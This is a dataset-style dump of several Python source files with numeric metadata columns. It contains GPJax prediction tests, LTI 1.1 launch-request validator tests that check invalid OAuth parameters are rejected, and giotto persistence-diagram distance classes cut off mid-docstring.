| 0
| 0
| 0
| 0
|
0
| 7
|
48240a62329cd3327ea4cc491f193c86197dd20d
| 136
|
py
|
Python
|
predicteasy/core/nlp/__init__.py
|
CleverInsight/predicteasy
|
d16354b46abc1de032c7b188666533898847fac1
|
[
"BSD-3-Clause"
] | 1
|
2021-09-06T21:20:06.000Z
|
2021-09-06T21:20:06.000Z
|
predicteasy/core/nlp/__init__.py
|
CleverInsight/predicteasy
|
d16354b46abc1de032c7b188666533898847fac1
|
[
"BSD-3-Clause"
] | 13
|
2020-07-16T10:51:25.000Z
|
2020-07-16T10:53:56.000Z
|
predicteasy/core/nlp/__init__.py
|
CleverInsight/predicteasy
|
d16354b46abc1de032c7b188666533898847fac1
|
[
"BSD-3-Clause"
] | 2
|
2020-07-16T10:45:26.000Z
|
2020-07-16T10:46:04.000Z
|
from predicteasy.core.nlp.sentiment import *
from predicteasy.core.nlp.summarize import *
from predicteasy.core.nlp.spelling import *
| 22.666667
| 44
| 0.808824
| 18
| 136
| 6.111111
| 0.444444
| 0.409091
| 0.518182
| 0.6
| 0.509091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102941
| 136
| 5
| 45
| 27.2
| 0.901639
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
82f2312f69dda837db6d3bcbd25f99c035402721
| 2,125
|
py
|
Python
|
tests/test_predict.py
|
thomaspinder/GPJax
|
929fcb88d13d15bb10e1175491dbc3e79622325a
|
[
"Apache-2.0"
] | 44
|
2020-12-03T14:07:39.000Z
|
2022-03-14T17:45:34.000Z
|
tests/test_predict.py
|
thomaspinder/GPJax
|
929fcb88d13d15bb10e1175491dbc3e79622325a
|
[
"Apache-2.0"
] | 28
|
2020-12-05T08:54:45.000Z
|
2022-03-01T09:56:50.000Z
|
tests/test_predict.py
|
thomaspinder/GPJax
|
929fcb88d13d15bb10e1175491dbc3e79622325a
|
[
"Apache-2.0"
] | 7
|
2021-02-05T12:37:57.000Z
|
2022-03-13T13:00:20.000Z
|
import jax.numpy as jnp
import jax.random as jr
from gpjax import Dataset, Prior
from gpjax.kernels import RBF
from gpjax.likelihoods import Bernoulli, Gaussian
from gpjax.parameters import initialise
from gpjax.predict import mean, variance
def test_conjugate_mean():
    """Predictive mean of a conjugate (Gaussian) posterior is (n*, d)."""
    key = jr.PRNGKey(123)
    xtest = jnp.linspace(-3.0, 3.0, 30).reshape(-1, 1)
    x = jr.uniform(key, shape=(20, 1), minval=-3.0, maxval=3.0)
    y = jnp.sin(x)
    training = Dataset(X=x, y=y)
    posterior = Prior(kernel=RBF()) * Gaussian()
    params = initialise(posterior)
    mu = mean(posterior, params, training)(xtest)
    assert mu.shape == (xtest.shape[0], y.shape[1])
def test_conjugate_variance():
    """Predictive covariance of a conjugate posterior is (n*, n*)."""
    key = jr.PRNGKey(123)
    xtest = jnp.linspace(-3.0, 3.0, 30).reshape(-1, 1)
    x = jr.uniform(key, shape=(20, 1), minval=-3.0, maxval=3.0)
    y = jnp.sin(x)
    training = Dataset(X=x, y=y)
    posterior = Prior(kernel=RBF()) * Gaussian()
    params = initialise(posterior)
    sigma = variance(posterior, params, training)(xtest)
    assert sigma.shape == (xtest.shape[0], xtest.shape[0])
def test_non_conjugate_mean():
    """Predictive mean of a non-conjugate (Bernoulli) posterior is 1-D."""
    key = jr.PRNGKey(123)
    x = jnp.sort(jr.uniform(key, shape=(10, 1), minval=-1.0, maxval=1.0), axis=0)
    y = 0.5 * jnp.sign(jnp.cos(3 * x + jr.normal(key, shape=x.shape) * 0.05)) + 0.5
    training = Dataset(X=x, y=y)
    xtest = jnp.linspace(-1.05, 1.05, 50).reshape(-1, 1)
    posterior = Prior(kernel=RBF()) * Bernoulli()
    params = initialise(posterior, x.shape[0])
    mu = mean(posterior, params, training)(xtest)
    assert mu.shape == (xtest.shape[0],)
def test_non_conjugate_variance():
    """Predictive variance of a non-conjugate posterior is 1-D."""
    key = jr.PRNGKey(123)
    x = jnp.sort(jr.uniform(key, shape=(10, 1), minval=-1.0, maxval=1.0), axis=0)
    y = 0.5 * jnp.sign(jnp.cos(3 * x + jr.normal(key, shape=x.shape) * 0.05)) + 0.5
    training = Dataset(X=x, y=y)
    xtest = jnp.linspace(-1.05, 1.05, 50).reshape(-1, 1)
    posterior = Prior(kernel=RBF()) * Bernoulli()
    params = initialise(posterior, x.shape[0])
    sigma = variance(posterior, params, training)(xtest)
    assert sigma.shape == (xtest.shape[0],)
| 30.797101
| 83
| 0.629647
| 345
| 2,125
| 3.849275
| 0.176812
| 0.040663
| 0.041416
| 0.045181
| 0.832078
| 0.832078
| 0.832078
| 0.763554
| 0.763554
| 0.763554
| 0
| 0.059684
| 0.195765
| 2,125
| 68
| 84
| 31.25
| 0.717379
| 0
| 0
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078431
| 1
| 0.078431
| false
| 0
| 0.137255
| 0
| 0.215686
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d24e569733e74a54f0efdc4bf4c198560ebe4c98
| 19,686
|
py
|
Python
|
ltiauthenticator/tests/test_lti11_validator.py
|
regisb/ltiauthenticator
|
c32307f7baf8a9a50863faf806983e1dd00ef6c4
|
[
"BSD-3-Clause"
] | 54
|
2018-01-20T03:09:30.000Z
|
2022-03-22T04:30:44.000Z
|
ltiauthenticator/tests/test_lti11_validator.py
|
regisb/ltiauthenticator
|
c32307f7baf8a9a50863faf806983e1dd00ef6c4
|
[
"BSD-3-Clause"
] | 68
|
2018-01-12T23:55:03.000Z
|
2022-01-27T14:24:08.000Z
|
ltiauthenticator/tests/test_lti11_validator.py
|
regisb/ltiauthenticator
|
c32307f7baf8a9a50863faf806983e1dd00ef6c4
|
[
"BSD-3-Clause"
] | 46
|
2018-02-23T09:17:29.000Z
|
2022-03-21T20:11:06.000Z
|
import pytest
from tornado.web import HTTPError
from ltiauthenticator.lti11.validator import LTI11LaunchValidator
def test_basic_lti11_launch_request(make_lti11_basic_launch_request_args):
    """A well-formed LTI 1.1 launch request validates successfully."""
    consumer_key = "my_consumer_key"
    shared_secret = "my_shared_secret"
    url = "http://jupyterhub/hub/lti/launch"
    form_headers = {"Content-Type": "application/x-www-form-urlencoded"}
    request_args = make_lti11_basic_launch_request_args(
        consumer_key, shared_secret
    )
    launch_validator = LTI11LaunchValidator({consumer_key: shared_secret})
    assert launch_validator.validate_launch_request(
        url, form_headers, request_args
    )
def test_launch_with_missing_oauth_nonce_key(make_lti11_basic_launch_request_args):
    """A launch request without the oauth_nonce key must be rejected."""
    consumer_key = "my_consumer_key"
    shared_secret = "my_shared_secret"
    url = "http://jupyterhub/hub/lti/launch"
    form_headers = {"Content-Type": "application/x-www-form-urlencoded"}
    request_args = make_lti11_basic_launch_request_args(
        consumer_key, shared_secret
    )
    del request_args["oauth_nonce"]
    launch_validator = LTI11LaunchValidator({consumer_key: shared_secret})
    with pytest.raises(HTTPError):
        launch_validator.validate_launch_request(url, form_headers, request_args)
def test_launch_with_empty_oauth_nonce_value(make_lti11_basic_launch_request_args):
    """A launch request with an empty oauth_nonce value must be rejected."""
    consumer_key = "my_consumer_key"
    shared_secret = "my_shared_secret"
    url = "http://jupyterhub/hub/lti/launch"
    form_headers = {"Content-Type": "application/x-www-form-urlencoded"}
    request_args = make_lti11_basic_launch_request_args(
        consumer_key, shared_secret
    )
    launch_validator = LTI11LaunchValidator({consumer_key: shared_secret})
    with pytest.raises(HTTPError):
        request_args["oauth_nonce"] = ""
        launch_validator.validate_launch_request(url, form_headers, request_args)
def test_launch_with_missing_oauth_timestamp_key(make_lti11_basic_launch_request_args):
    """A launch request without the oauth_timestamp key must be rejected."""
    consumer_key = "my_consumer_key"
    shared_secret = "my_shared_secret"
    url = "http://jupyterhub/hub/lti/launch"
    form_headers = {"Content-Type": "application/x-www-form-urlencoded"}
    request_args = make_lti11_basic_launch_request_args(
        consumer_key, shared_secret
    )
    del request_args["oauth_timestamp"]
    launch_validator = LTI11LaunchValidator({consumer_key: shared_secret})
    with pytest.raises(HTTPError):
        launch_validator.validate_launch_request(url, form_headers, request_args)
def test_launch_with_missing_oauth_consumer_key_key(
    make_lti11_basic_launch_request_args,
):
    """A launch request without the oauth_consumer_key key must be rejected."""
    consumer_key = "my_consumer_key"
    shared_secret = "my_shared_secret"
    url = "http://jupyterhub/hub/lti/launch"
    form_headers = {"Content-Type": "application/x-www-form-urlencoded"}
    request_args = make_lti11_basic_launch_request_args(
        consumer_key, shared_secret
    )
    del request_args["oauth_consumer_key"]
    launch_validator = LTI11LaunchValidator({consumer_key: shared_secret})
    with pytest.raises(HTTPError):
        launch_validator.validate_launch_request(url, form_headers, request_args)
def test_launch_with_empty_oauth_consumer_key_value(
    make_lti11_basic_launch_request_args,
):
    """A launch request with an empty oauth_consumer_key must be rejected."""
    consumer_key = "my_consumer_key"
    shared_secret = "my_shared_secret"
    url = "http://jupyterhub/hub/lti/launch"
    form_headers = {"Content-Type": "application/x-www-form-urlencoded"}
    request_args = make_lti11_basic_launch_request_args(
        consumer_key, shared_secret
    )
    launch_validator = LTI11LaunchValidator({consumer_key: shared_secret})
    with pytest.raises(HTTPError):
        request_args["oauth_consumer_key"] = ""
        launch_validator.validate_launch_request(url, form_headers, request_args)
def test_launch_with_fake_oauth_consumer_key_value(
    make_lti11_basic_launch_request_args,
):
    """A launch request signed with an unknown consumer key must be rejected."""
    consumer_key = "my_consumer_key"
    shared_secret = "my_shared_secret"
    url = "http://jupyterhub/hub/lti/launch"
    form_headers = {"Content-Type": "application/x-www-form-urlencoded"}
    request_args = make_lti11_basic_launch_request_args(
        consumer_key, shared_secret
    )
    launch_validator = LTI11LaunchValidator({consumer_key: shared_secret})
    with pytest.raises(HTTPError):
        # Swap in a consumer key the validator has never heard of.
        request_args["oauth_consumer_key"] = b"fake_consumer_key".decode("utf-8")
        assert launch_validator.validate_launch_request(
            url, form_headers, request_args
        )
def test_launch_with_missing_oauth_signature_method_key(
    make_lti11_basic_launch_request_args,
):
    """A launch request without oauth_signature_method must be rejected."""
    consumer_key = "my_consumer_key"
    shared_secret = "my_shared_secret"
    url = "http://jupyterhub/hub/lti/launch"
    form_headers = {"Content-Type": "application/x-www-form-urlencoded"}
    request_args = make_lti11_basic_launch_request_args(
        consumer_key, shared_secret
    )
    del request_args["oauth_signature_method"]
    launch_validator = LTI11LaunchValidator({consumer_key: shared_secret})
    with pytest.raises(HTTPError):
        launch_validator.validate_launch_request(url, form_headers, request_args)
def test_launch_with_empty_oauth_signature_method_value(
    make_lti11_basic_launch_request_args,
):
    """
    The validator must raise HTTPError when oauth_signature_method is
    present but empty.
    """
    key, secret = "my_consumer_key", "my_shared_secret"
    args = make_lti11_basic_launch_request_args(key, secret)
    args["oauth_signature_method"] = ""
    validator = LTI11LaunchValidator({key: secret})
    with pytest.raises(HTTPError):
        validator.validate_launch_request(
            "http://jupyterhub/hub/lti/launch",
            {"Content-Type": "application/x-www-form-urlencoded"},
            args,
        )
def test_launch_with_missing_oauth_callback_key(make_lti11_basic_launch_request_args):
    """
    The validator must raise HTTPError when the oauth_callback argument
    is absent from the request.
    """
    key, secret = "my_consumer_key", "my_shared_secret"
    args = make_lti11_basic_launch_request_args(key, secret)
    del args["oauth_callback"]
    validator = LTI11LaunchValidator({key: secret})
    with pytest.raises(HTTPError):
        validator.validate_launch_request(
            "http://jupyterhub/hub/lti/launch",
            {"Content-Type": "application/x-www-form-urlencoded"},
            args,
        )
def test_launch_with_empty_oauth_callback_value(
    make_lti11_basic_launch_request_args,
):
    """
    The validator must raise HTTPError when oauth_callback is present
    but empty.
    """
    key, secret = "my_consumer_key", "my_shared_secret"
    args = make_lti11_basic_launch_request_args(key, secret)
    args["oauth_callback"] = ""
    validator = LTI11LaunchValidator({key: secret})
    with pytest.raises(HTTPError):
        validator.validate_launch_request(
            "http://jupyterhub/hub/lti/launch",
            {"Content-Type": "application/x-www-form-urlencoded"},
            args,
        )
def test_launch_with_missing_oauth_version_key(make_lti11_basic_launch_request_args):
    """
    The validator must raise HTTPError when the oauth_version argument
    is absent from the request.
    """
    key, secret = "my_consumer_key", "my_shared_secret"
    args = make_lti11_basic_launch_request_args(key, secret)
    del args["oauth_version"]
    validator = LTI11LaunchValidator({key: secret})
    with pytest.raises(HTTPError):
        validator.validate_launch_request(
            "http://jupyterhub/hub/lti/launch",
            {"Content-Type": "application/x-www-form-urlencoded"},
            args,
        )
def test_launch_with_empty_oauth_version_value(
    make_lti11_basic_launch_request_args,
):
    """
    The validator must raise HTTPError when oauth_version is present
    but empty.
    """
    key, secret = "my_consumer_key", "my_shared_secret"
    args = make_lti11_basic_launch_request_args(key, secret)
    args["oauth_version"] = ""
    validator = LTI11LaunchValidator({key: secret})
    with pytest.raises(HTTPError):
        validator.validate_launch_request(
            "http://jupyterhub/hub/lti/launch",
            {"Content-Type": "application/x-www-form-urlencoded"},
            args,
        )
def test_launch_with_missing_oauth_signature_key(make_lti11_basic_launch_request_args):
    """
    The validator must raise HTTPError when the oauth_signature argument
    is absent from the request.
    """
    key, secret = "my_consumer_key", "my_shared_secret"
    args = make_lti11_basic_launch_request_args(key, secret)
    del args["oauth_signature"]
    validator = LTI11LaunchValidator({key: secret})
    with pytest.raises(HTTPError):
        validator.validate_launch_request(
            "http://jupyterhub/hub/lti/launch",
            {"Content-Type": "application/x-www-form-urlencoded"},
            args,
        )
def test_launch_with_empty_oauth_signature_value(
    make_lti11_basic_launch_request_args,
):
    """
    The validator must raise HTTPError when oauth_signature is present
    but empty.
    """
    key, secret = "my_consumer_key", "my_shared_secret"
    args = make_lti11_basic_launch_request_args(key, secret)
    args["oauth_signature"] = ""
    validator = LTI11LaunchValidator({key: secret})
    with pytest.raises(HTTPError):
        validator.validate_launch_request(
            "http://jupyterhub/hub/lti/launch",
            {"Content-Type": "application/x-www-form-urlencoded"},
            args,
        )
def test_unregistered_consumer_key(make_lti11_basic_launch_request_args):
    """
    Does the launch request fail with a consumer key that does not match?
    """
    oauth_consumer_key = "my_consumer_key"
    oauth_consumer_secret = "my_shared_secret"
    launch_url = "http://jupyterhub/hub/lti/launch"
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    args = make_lti11_basic_launch_request_args(
        oauth_consumer_key,
        oauth_consumer_secret,
    )
    validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
    args["oauth_consumer_key"] = "fake_consumer_key"
    # No `assert` around the call: pytest.raises already fails the test
    # if HTTPError is not raised, so the assert was dead code.
    with pytest.raises(HTTPError):
        validator.validate_launch_request(launch_url, headers, args)
def test_unregistered_shared_secret(make_lti11_basic_launch_request_args):
    """
    The validator must raise HTTPError when the request was signed with a
    shared secret different from the one registered for the consumer key.
    """
    key = "my_consumer_key"
    # Sign the request with one secret, register a different one.
    args = make_lti11_basic_launch_request_args(key, "my_shared_secret")
    validator = LTI11LaunchValidator({key: "my_other_shared_secret"})
    with pytest.raises(HTTPError):
        validator.validate_launch_request(
            "http://jupyterhub/hub/lti/launch",
            {"Content-Type": "application/x-www-form-urlencoded"},
            args,
        )
def test_launch_with_missing_lti_message_type(make_lti11_basic_launch_request_args):
    """
    The validator must raise HTTPError when the lti_message_type argument
    is absent from the request.
    """
    key, secret = "my_consumer_key", "my_shared_secret"
    args = make_lti11_basic_launch_request_args(key, secret)
    del args["lti_message_type"]
    validator = LTI11LaunchValidator({key: secret})
    with pytest.raises(HTTPError):
        validator.validate_launch_request(
            "http://jupyterhub/hub/lti/launch",
            {"Content-Type": "application/x-www-form-urlencoded"},
            args,
        )
def test_launch_with_empty_lti_message_type(
    make_lti11_basic_launch_request_args,
):
    """
    The validator must raise HTTPError when lti_message_type is present
    but empty.
    """
    key, secret = "my_consumer_key", "my_shared_secret"
    args = make_lti11_basic_launch_request_args(key, secret)
    args["lti_message_type"] = ""
    validator = LTI11LaunchValidator({key: secret})
    with pytest.raises(HTTPError):
        validator.validate_launch_request(
            "http://jupyterhub/hub/lti/launch",
            {"Content-Type": "application/x-www-form-urlencoded"},
            args,
        )
def test_launch_with_missing_lti_version(make_lti11_basic_launch_request_args):
    """
    Does the launch request work with a missing lti_version key?
    """
    oauth_consumer_key = "my_consumer_key"
    oauth_consumer_secret = "my_shared_secret"
    launch_url = "http://jupyterhub/hub/lti/launch"
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    args = make_lti11_basic_launch_request_args(
        oauth_consumer_key,
        oauth_consumer_secret,
    )
    # Remove the required lti_version argument entirely; validation
    # should then reject the launch request.
    del args["lti_version"]
    validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
    with pytest.raises(HTTPError):
        validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_empty_lti_version(make_lti11_basic_launch_request_args):
    """
    Does the launch request work with an empty lti_version value?
    """
    oauth_consumer_key = "my_consumer_key"
    oauth_consumer_secret = "my_shared_secret"
    launch_url = "http://jupyterhub/hub/lti/launch"
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    args = make_lti11_basic_launch_request_args(
        oauth_consumer_key,
        oauth_consumer_secret,
    )
    validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
    with pytest.raises(HTTPError):
        # Blank out lti_version; validation should reject the request.
        args["lti_version"] = ""
        validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_missing_resource_link_id(make_lti11_basic_launch_request_args):
    """
    The validator must raise HTTPError when the resource_link_id argument
    is absent from the request.
    """
    key, secret = "my_consumer_key", "my_shared_secret"
    args = make_lti11_basic_launch_request_args(key, secret)
    del args["resource_link_id"]
    validator = LTI11LaunchValidator({key: secret})
    with pytest.raises(HTTPError):
        validator.validate_launch_request(
            "http://jupyterhub/hub/lti/launch",
            {"Content-Type": "application/x-www-form-urlencoded"},
            args,
        )
def test_launch_with_empty_resource_link_id(
    make_lti11_basic_launch_request_args,
):
    """
    The validator must raise HTTPError when resource_link_id is present
    but empty.
    """
    key, secret = "my_consumer_key", "my_shared_secret"
    args = make_lti11_basic_launch_request_args(key, secret)
    args["resource_link_id"] = ""
    validator = LTI11LaunchValidator({key: secret})
    with pytest.raises(HTTPError):
        validator.validate_launch_request(
            "http://jupyterhub/hub/lti/launch",
            {"Content-Type": "application/x-www-form-urlencoded"},
            args,
        )
def test_launch_with_missing_user_id_key(make_lti11_basic_launch_request_args):
    """
    The validator must raise HTTPError when the user_id argument is
    absent from the request.
    """
    key, secret = "my_consumer_key", "my_shared_secret"
    args = make_lti11_basic_launch_request_args(key, secret)
    del args["user_id"]
    validator = LTI11LaunchValidator({key: secret})
    with pytest.raises(HTTPError):
        validator.validate_launch_request(
            "http://jupyterhub/hub/lti/launch",
            {"Content-Type": "application/x-www-form-urlencoded"},
            args,
        )
def test_launch_with_empty_user_id_value(make_lti11_basic_launch_request_args):
    """
    The validator must raise HTTPError when user_id is present but empty.
    """
    key, secret = "my_consumer_key", "my_shared_secret"
    args = make_lti11_basic_launch_request_args(key, secret)
    args["user_id"] = ""
    validator = LTI11LaunchValidator({key: secret})
    with pytest.raises(HTTPError):
        validator.validate_launch_request(
            "http://jupyterhub/hub/lti/launch",
            {"Content-Type": "application/x-www-form-urlencoded"},
            args,
        )
def test_launch_with_same_oauth_timestamp_different_oauth_nonce(
    make_lti11_basic_launch_request_args,
):
    """
    The validator must raise HTTPError when the nonce is changed after
    signing while the timestamp stays the same (signature no longer
    matches the arguments).
    """
    key, secret = "my_consumer_key", "my_shared_secret"
    args = make_lti11_basic_launch_request_args(key, secret)
    # Tamper with the nonce without re-signing the request.
    args["oauth_nonce"] = "fake_nonce"
    validator = LTI11LaunchValidator({key: secret})
    with pytest.raises(HTTPError):
        validator.validate_launch_request(
            "http://jupyterhub/hub/lti/launch",
            {"Content-Type": "application/x-www-form-urlencoded"},
            args,
        )
def test_launch_with_same_oauth_nonce_different_oauth_timestamp(
    make_lti11_basic_launch_request_args,
):
    """
    The validator must raise HTTPError when the timestamp is changed
    after signing while the nonce stays the same (signature no longer
    matches the arguments).
    """
    key, secret = "my_consumer_key", "my_shared_secret"
    args = make_lti11_basic_launch_request_args(key, secret)
    # Tamper with the timestamp without re-signing the request.
    args["oauth_timestamp"] = "0123456789"
    validator = LTI11LaunchValidator({key: secret})
    with pytest.raises(HTTPError):
        validator.validate_launch_request(
            "http://jupyterhub/hub/lti/launch",
            {"Content-Type": "application/x-www-form-urlencoded"},
            args,
        )
| 32.431631
| 87
| 0.738393
| 2,433
| 19,686
| 5.546239
| 0.033703
| 0.163776
| 0.106714
| 0.142285
| 0.949755
| 0.940418
| 0.940418
| 0.937824
| 0.934119
| 0.934119
| 0
| 0.011065
| 0.173677
| 19,686
| 606
| 88
| 32.485149
| 0.818467
| 0.09108
| 0
| 0.778667
| 0
| 0
| 0.192231
| 0.054751
| 0
| 0
| 0
| 0
| 0.008
| 1
| 0.072
| false
| 0
| 0.008
| 0
| 0.08
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d26ad65ebb841cb4464714963fb2672339818ce5
| 15,738
|
py
|
Python
|
giotto/diagrams/distance.py
|
fossabot/giotto-learn-1
|
e68dacf2f34bd0d0513c816a723627431bed4b4a
|
[
"Apache-2.0"
] | 1
|
2020-03-27T12:09:09.000Z
|
2020-03-27T12:09:09.000Z
|
giotto/diagrams/distance.py
|
marta-l2f/giotto-learn
|
7e693b76e03ea422a3046fc8931f0be6b02fab64
|
[
"Apache-2.0"
] | null | null | null |
giotto/diagrams/distance.py
|
marta-l2f/giotto-learn
|
7e693b76e03ea422a3046fc8931f0be6b02fab64
|
[
"Apache-2.0"
] | null | null | null |
# License: Apache 2.0
import numpy as np
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.utils.validation import check_is_fitted
from ._metrics import _parallel_pairwise, _parallel_amplitude
from ._utils import _discretize
from ..utils.validation import check_diagram, validate_params, \
validate_metric_params
class PairwiseDistance(BaseEstimator, TransformerMixin):
    """`Distances <https://giotto.ai/theory>`_ between pairs of persistence
    diagrams, constructed from the distances between their respective
    subdiagrams with constant homology dimension.

    Given two collections of persistence diagrams consisting of
    birth-death-dimension triples [b, d, q], a collection of distance
    matrices or a single distance matrix between pairs of diagrams is
    calculated according to the following steps:

        1. All diagrams are partitioned into subdiagrams corresponding to
           distinct homology dimensions.
        2. Pairwise distances between subdiagrams of equal homology
           dimension are calculated according to the parameters `metric` and
           `metric_params`. This gives a collection of distance matrices,
           :math:`\\mathbf{D} = (D_{q_1}, \\ldots, D_{q_n})`.
        3. The final result is either :math:`\\mathbf{D}` itself as a
           three-dimensional array, or a single distance matrix constructed
           by taking norms of the vectors of distances between diagram pairs.

    Parameters
    ----------
    metric : ``'bottleneck'`` | ``'wasserstein'`` | ``'landscape'`` | \
        ``'betti'`` | ``'heat'``, optional, default: ``'landscape'``
        Distance or dissimilarity function between subdiagrams:

        - ``'bottleneck'`` and ``'wasserstein'`` refer to the identically named
          perfect-matching--based notions of distance.
        - ``'landscape'`` refers to the :math:`L^p` distance between
          persistence landscapes.
        - ``'betti'`` refers to the :math:`L^p` distance between Betti curves.
        - ``'heat'`` refers to the :math:`L^p` distance between
          Gaussian-smoothed diagrams.

    metric_params : dict or None, optional, default: ``None``
        Additional keyword arguments for the metric function:

        - If ``metric == 'bottleneck'`` the only argument is `delta` (float,
          default: ``0.01``). When equal to ``0.``, an exact algorithm is
          used; otherwise, a faster approximate algorithm is used.
        - If ``metric == 'wasserstein'`` the available arguments are `p`
          (int, default: ``2``) and `delta` (float, default: ``0.01``).
          Unlike the case of ``'bottleneck'``, `delta` cannot be set to
          ``0.`` and an exact algorithm is not available.
        - If ``metric == 'betti'`` the available arguments are `p` (float,
          default: ``2.``) and `n_values` (int, default: ``100``).
        - If ``metric == 'landscape'`` the available arguments are `p`
          (float, default: ``2.``), `n_values` (int, default: ``100``) and
          `n_layers` (int, default: ``1``).
        - If ``metric == 'heat'`` the available arguments are `p`
          (float, default: ``2.``), `sigma` (float, default: ``1.``) and
          `n_values` (int, default: ``100``).

    order : float or None, optional, default: ``2.``
        If ``None``, :meth:`transform` returns for each pair of diagrams a
        vector of distances corresponding to the dimensions in
        :attr:`homology_dimensions_`. Otherwise, the :math:`p`-norm of
        these vectors with :math:`p` equal to `order` is taken.

    n_jobs : int or None, optional, default: ``None``
        The number of jobs to use for the computation. ``None`` means 1 unless
        in a :obj:`joblib.parallel_backend` context. ``-1`` means using all
        processors.

    Attributes
    ----------
    effective_metric_params_ : dict
        Dictionary containing all information present in `metric_params` as
        well as on any relevant quantities computed in :meth:`fit`.

    homology_dimensions_ : list
        Homology dimensions seen in :meth:`fit`, sorted in ascending order.

    See also
    --------
    Amplitude, BettiCurve, PersistenceLandscape, HeatKernel, \
    giotto.homology.VietorisRipsPersistence

    Notes
    -----
    To compute distances without first splitting the computation between
    different homology dimensions, data should be first transformed by an
    instance of :class:`ForgetDimension`.
    `Hera <https://bitbucket.org/grey_narn/hera>`_ is used as a C++ backend
    for computing bottleneck and Wasserstein distances between persistence
    diagrams. Python bindings were modified for performance from the
    `Dyonisus 2 <https://mrzv.org/software/dionysus2/>`_ package.
    """
    # Only `order` is validated through `validate_params`; `metric` and
    # `metric_params` are checked separately by `validate_metric_params`.
    _hyperparameters = {'order': [float, (1, np.inf)]}
    def __init__(self, metric='landscape', metric_params=None, order=2.,
                 n_jobs=None):
        self.metric = metric
        self.metric_params = metric_params
        self.order = order
        self.n_jobs = n_jobs
    def fit(self, X, y=None):
        """Store all observed homology dimensions in
        :attr:`homology_dimensions_` and compute
        :attr:`effective_metric_params_`. Then, return the estimator.

        This method is there to implement the usual scikit-learn API and hence
        work in pipelines.

        Parameters
        ----------
        X : ndarray, shape (n_samples_fit, n_features, 3)
            Input data. Array of persistence diagrams, each a collection of
            triples [b, d, q] representing persistent topological features
            through their birth (b), death (d) and homology dimension (q).

        y : None
            There is no need for a target in a transformer, yet the pipeline
            API requires this parameter.

        Returns
        -------
        self : object
        """
        X = check_diagram(X)
        # Work on a copy so user-supplied metric_params is never mutated.
        if self.metric_params is None:
            self.effective_metric_params_ = {}
        else:
            self.effective_metric_params_ = self.metric_params.copy()
        hyperparameters = self.get_params().copy()
        if self.order is not None:
            if isinstance(self.order, int):
                hyperparameters['order'] = float(self.order)
        else:
            hyperparameters['order'] = 1.  # Automatically pass validate_params
        validate_params(hyperparameters, self._hyperparameters)
        validate_metric_params(self.metric, self.effective_metric_params_)
        # Dimensions are read off the first diagram's third column.
        self.homology_dimensions_ = sorted(set(X[0, :, 2]))
        # Sampling-based metrics need discretization parameters up front.
        if self.metric in ['landscape', 'heat', 'betti']:
            self.effective_metric_params_['samplings'], \
                self.effective_metric_params_['step_sizes'] = \
                _discretize(X, **self.effective_metric_params_)
        # Kept so transform can detect X == fit-data and compute a
        # symmetric matrix (X2=None) instead of a cross-distance matrix.
        self._X = X
        return self
    def transform(self, X, y=None):
        """Computes a distance or vector of distances between the diagrams in
        `X` and the diagrams seen in :meth:`fit`.

        Parameters
        ----------
        X : ndarray, shape (n_samples, n_features, 3)
            Input data. Array of persistence diagrams, each a collection of
            triples [b, d, q] representing persistent topological features
            through their birth (b), death (d) and homology dimension (q).

        y : None
            There is no need for a target in a transformer, yet the pipeline
            API requires this parameter.

        Returns
        -------
        Xt : ndarray, shape (n_samples_fit, n_samples, n_homology_dimensions) \
            if `order` is ``None``, else (n_samples_fit, n_samples)
            Distance matrix or collection of distance matrices between
            diagrams in `X` and diagrams seen in :meth:`fit`. In the
            second case, index i along axis 2 corresponds to the i-th
            homology dimension in :attr:`homology_dimensions_`.
        """
        check_is_fitted(self, ['effective_metric_params_',
                               'homology_dimensions_'])
        X = check_diagram(X)
        # X2=None signals _parallel_pairwise to compute pairwise distances
        # within self._X only (the fit/transform inputs are identical).
        if np.array_equal(X, self._X):
            X2 = None
        else:
            X2 = X
        Xt = _parallel_pairwise(self._X, X2, self.metric,
                                self.effective_metric_params_,
                                self.homology_dimensions_,
                                self.n_jobs)
        # Collapse the per-dimension axis into a single matrix when
        # an order for the norm was requested.
        if self.order is not None:
            Xt = np.linalg.norm(Xt, axis=2, ord=self.order)
        return Xt
class Amplitude(BaseEstimator, TransformerMixin):
    """`Amplitudes <https://giotto.ai/theory>`_ of persistence diagrams,
    constructed from the amplitudes of their subdiagrams with constant
    homology dimension.

    Given a single persistence diagram consisting of birth-death-dimension
    triples [b, d, q], a vector of amplitudes or a single scalar amplitude is
    calculated according to the following steps:

        1. All diagrams are partitioned into subdiagrams corresponding to
           distinct homology dimensions.
        2. The amplitude of each subdiagram is calculated according to the
           parameters `metric` and `metric_params`. This gives a vector of
           amplitudes, :math:`\\mathbf{a} = (a_{q_1}, \\ldots, a_{q_n})`.
        3. The final result is either :math:`\\mathbf{a}` itself or
